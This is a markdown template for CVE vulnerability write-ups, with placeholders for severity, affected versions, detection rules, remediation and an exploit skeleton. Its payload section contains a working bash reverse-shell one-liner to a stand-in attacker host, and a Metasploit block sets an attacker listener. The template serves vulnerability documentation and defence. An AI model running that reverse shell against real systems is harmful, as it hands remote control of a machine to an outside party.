## Overview
[Brief description of the vulnerability - what it does, why it matters]
## Vulnerability Details
| Attribute | Details |
|---|---|
| CVE ID | CVE-YYYY-XXXXX |
| CWE | CWE-XXX - [CWE_NAME] |
| CVSS v3.1 | 0.0 CVSS:3.1/… |
| Severity | [SEVERITY] |
| Attack Vector | [Network/Adjacent/Local/Physical] |
| Attack Complexity | [Low/High] |
| Privileges Required | [None/Low/High] |
| User Interaction | [None/Required] |
| Scope | [Unchanged/Changed] |
| Published | YYYY-MM-DD |
| Last Modified | YYYY-MM-DD |
### CVSS Breakdown
- Base Score: 0.0
- Impact Score: 0.0
- Exploitability Score: 0.0
Impact:
- Confidentiality: [None/Low/High]
- Integrity: [None/Low/High]
- Availability: [None/Low/High]
## Affected Systems
### Vulnerable Versions
| Vendor | Product | Affected Versions | Fixed Version |
|---|---|---|---|
| [VENDOR] | [PRODUCT] | [X.X - X.X] | [X.X] or TBA |
### Platform-Specific Details
Operating Systems:
- Windows
- Linux
- macOS
- All platforms
Common Affected Applications:
- Application 1
- Application 2
- Application 3
Prerequisites:
- Prerequisite 1
- Prerequisite 2
- Prerequisite 3
## Technical Analysis
### Root Cause
[Explain what causes the vulnerability at a technical level]
### Attack Scenario
### Exploitation
### Detection
Check if system is vulnerable:
```bash
# Linux detection commands
[DETECTION_COMMAND]
```
```
# Windows detection commands
[DETECTION_COMMAND]
```
Version checking:
```bash
# Check version
[VERSION_CHECK_COMMAND]
```
## Proof of Concept (PoC)
**Ethical Use Only:** This PoC is for authorized testing only. Unauthorized access is illegal.
### Method 1: [EXPLOITATION_METHOD_NAME]
**Step 1:** [DESCRIPTION]
```bash
# Commands
[EXPLOIT_COMMANDS]
```
**Step 2:** [DESCRIPTION]
```bash
# Commands
[EXPLOIT_COMMANDS]
```
**Step 3:** Verify success
```bash
# Verification
[VERIFICATION_COMMANDS]
```
### Method 2: Using Metasploit (if applicable)
```
msfconsole
use exploit/[MODULE_PATH]
set RHOSTS [TARGET_IP]
set LHOST [ATTACKER_IP]
set LPORT 4444
exploit
```
### Exploitation Code
```python
#!/usr/bin/env python3
"""
CVE-YYYY-XXXXX Exploit
Author: [YOUR_NAME]
Description: [BRIEF_DESCRIPTION]
"""
import requests
import sys


def exploit(target, command):
    """
    Exploit CVE-YYYY-XXXXX
    """
    payload = {
        # Craft your payload
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    try:
        response = requests.post(
            f"{target}/vulnerable-endpoint",
            json=payload,
            headers=headers,
            timeout=10
        )
        print(f"[+] Status: {response.status_code}")
        print(f"[+] Response: {response.text}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 exploit.py <target_url>")
        sys.exit(1)
    exploit(sys.argv[1], "id")
```
### Payload Examples
Basic payload:
```
[BASIC_PAYLOAD]
```
Reverse shell (Linux):
```bash
bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1'
```
Reverse shell (Windows):
```
[WINDOWS_REVERSE_SHELL]
```
## Detection & Monitoring
### Indicators of Compromise (IoCs)
Network Indicators:
IP Addresses:
- [MALICIOUS_IP_1]
- [MALICIOUS_IP_2]
Domains:
- [MALICIOUS_DOMAIN]
User-Agents:
- [MALICIOUS_USER_AGENT]
File Indicators:
File Hashes (SHA256):
- [HASH_1]
File Paths:
- [SUSPICIOUS_FILE_PATH]
Process Indicators:
- [SUSPICIOUS_PROCESS_1]
- [SUSPICIOUS_PROCESS_2]
### Detection Rules
#### Sigma Rule
```yaml
title: CVE-YYYY-XXXXX Exploitation Attempt
id: [GENERATE_UUID]
status: experimental
description: Detects exploitation attempts for CVE-YYYY-XXXXX
references:
  - https://nvd.nist.gov/vuln/detail/CVE-YYYY-XXXXX
author: [YOUR_NAME]
date: YYYY-MM-DD
logsource:
  category: [LOG_CATEGORY]
  product: [PRODUCT]
detection:
  selection:
    field1: 'value1'
    field2: 'value2'
  condition: selection
falsepositives:
  - [FALSE_POSITIVE_1]
level: [critical/high/medium]
tags:
  - attack.[TACTIC]
  - attack.[TECHNIQUE]
  - cve.YYYY.XXXXX
```
#### Snort Rule
```
alert tcp any any -> any [PORT] (msg:"CVE-YYYY-XXXXX Exploitation Attempt"; content:"[PATTERN]"; flow:to_server,established; classtype:attempted-admin; sid:[SID]; rev:1;)
```
### Log Analysis
What to look for:
- [LOG_INDICATOR_1]
- [LOG_INDICATOR_2]
- [LOG_INDICATOR_3]
Example log entry:
```
[YYYY-MM-DD HH:MM:SS] [LOG_ENTRY_EXAMPLE]
```
## Remediation
### Immediate Actions
- [ ] Identify affected systems
  ```bash
  # Commands to identify
  [IDENTIFICATION_COMMANDS]
  ```
- [ ] Isolate affected systems
  ```bash
  # Isolation commands
  [ISOLATION_COMMANDS]
  ```
- [ ] Review logs for exploitation
  ```bash
  # Log review commands
  [LOG_REVIEW_COMMANDS]
  ```
### Patching
#### Vendor Patches
| Vendor | Advisory | Patch Link | Status |
|---|---|---|---|
| [VENDOR] | [ADVISORY_ID] | [LINK] | [STATUS] |
#### Manual Patching
```bash
# Linux
[LINUX_PATCH_COMMANDS]
```
```
# Windows
[WINDOWS_PATCH_COMMANDS]
```
#### Verification
```bash
# Verify patch is applied
[VERIFICATION_COMMANDS]
```
### Workarounds
**Option 1:** [WORKAROUND_NAME]
```bash
# Workaround commands
[WORKAROUND_COMMANDS]
```
**Option 2:** [ALTERNATE_WORKAROUND]
```bash
# Alternate workaround
[ALTERNATE_COMMANDS]
```
### Long-term Mitigations
- Mitigation 1
- Mitigation 2
- Mitigation 3
- Mitigation 4
- Mitigation 5
## Related Writeups
## Tools & Resources
### Exploitation Tools
### Scanning Tools
```bash
# Nmap
nmap --script [SCRIPT_NAME] -p [PORT] [TARGET]
# Nuclei
nuclei -t cves/[YEAR]/CVE-YYYY-XXXXX.yaml -u [TARGET]
```
## MITRE ATT&CK Mapping
Tactics:
Techniques:
Sub-techniques:
- T0000.001 - [SUB_TECHNIQUE_NAME]